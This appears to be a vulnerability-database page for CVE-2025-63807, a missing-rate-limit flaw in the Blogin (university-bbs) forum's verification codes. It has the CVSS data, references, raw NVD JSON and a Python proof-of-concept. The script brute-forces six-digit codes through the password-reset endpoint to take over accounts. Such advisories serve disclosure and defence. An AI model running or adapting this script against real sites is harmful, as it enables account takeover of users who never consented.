CVE-2025-63807

Description

An issue was discovered in weijiang1994 university-bbs (aka Blogin) in commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13). A weak verification code generation mechanism combined with missing rate limiting allows attackers to perform brute-force attacks on verification codes without authentication. Successful exploitation may result in account takeover via password reset or other authentication bypass methods.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:2dogz:blogin:*:*:*:*:*:*:*:* - VULNERABLE

weijiang1994 university-bbs (Blogin) commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13) 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-63807 PoC - weijiang1994 university-bss weak verification code brute force Note: This PoC is for educational and security research purposes only. """ import requests import itertools import string import time TARGET_URL = "http://target.com" # Replace with target URL VERIFY_CODE_ENDPOINT = "/api/verify/code" # Replace with actual endpoint FORGOT_PASSWORD_ENDPOINT = "/api/user/forgot-password" def generate_verification_codes(length=6): """Generate possible verification codes based on common patterns""" # Common numeric patterns for code in itertools.product(string.digits, repeat=length): yield ''.join(code) def check_rate_limiting(): """Check if rate limiting is implemented""" response = requests.post(f"{TARGET_URL}{VERIFY_CODE_ENDPOINT}", json={ "email": "[email protected]" }) # Send multiple requests to test rate limiting for i in range(100): resp = requests.post(f"{TARGET_URL}{VERIFY_CODE_ENDPOINT}", json={ "email": "[email protected]" }) if resp.status_code == 429: print("Rate limiting detected") return False print("No rate limiting detected - vulnerable!") return True def brute_force_verification_code(email, max_attempts=10000): """ Attempt to brute force the verification code """ print(f"[*] Starting brute force attack on {email}") print(f"[*] Target: {TARGET_URL}") # Request a new verification code first requests.post(f"{TARGET_URL}{VERIFY_CODE_ENDPOINT}", json={ "email": email }) attempt = 0 for code in generate_verification_codes(6): attempt += 1 if attempt > max_attempts: break response = requests.post(f"{TARGET_URL}{FORGOT_PASSWORD_ENDPOINT}", json={ "email": email, "code": code, "new_password": "HackedPass123!" }) if "success" in response.text.lower() or response.status_code == 200: print(f"[!] Valid code found: {code}") print(f"[!] Account takeover successful!") return code if attempt % 100 == 0: print(f"[*] Attempts: {attempt}") print("[-] Brute force failed or rate limiting prevented further attempts") return None if __name__ == "__main__": print("CVE-2025-63807 PoC") print("=" * 50) # First check if vulnerable (no rate limiting) if not check_rate_limiting(): print("Target appears to have rate limiting - may not be vulnerable") # Uncomment to run actual attack # target_email = "[email protected]" # brute_force_verification_code(target_email)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63807
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63807
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63807/
[4] VulDB https://vuldb.com/cve/CVE-2025-63807
[5] https://gist.github.com/Rycarl-Furry/3e93c6f0d48a29518adf341e0fc7e2dd

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63807", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:06.617", "lastModified": "2026-01-15T16:59:02.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in weijiang1994 university-bbs (aka Blogin) in commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13). A weak verification code generation mechanism combined with missing rate limiting allows attackers to perform brute-force attacks on verification codes without authentication. Successful exploitation may result in account takeover via password reset or other authentication bypass methods."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:2dogz:blogin:*:*:*:*:*:*:*:*", "versionEndIncluding": "2024-11-09", "matchCriteriaId": "3CC0D0E0-A890-41DD-BCFC-A59169D5F2BA"}]}]}], "references": [{"url": "https://gist.github.com/Rycarl-Furry/3e93c6f0d48a29518adf341e0fc7e2dd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}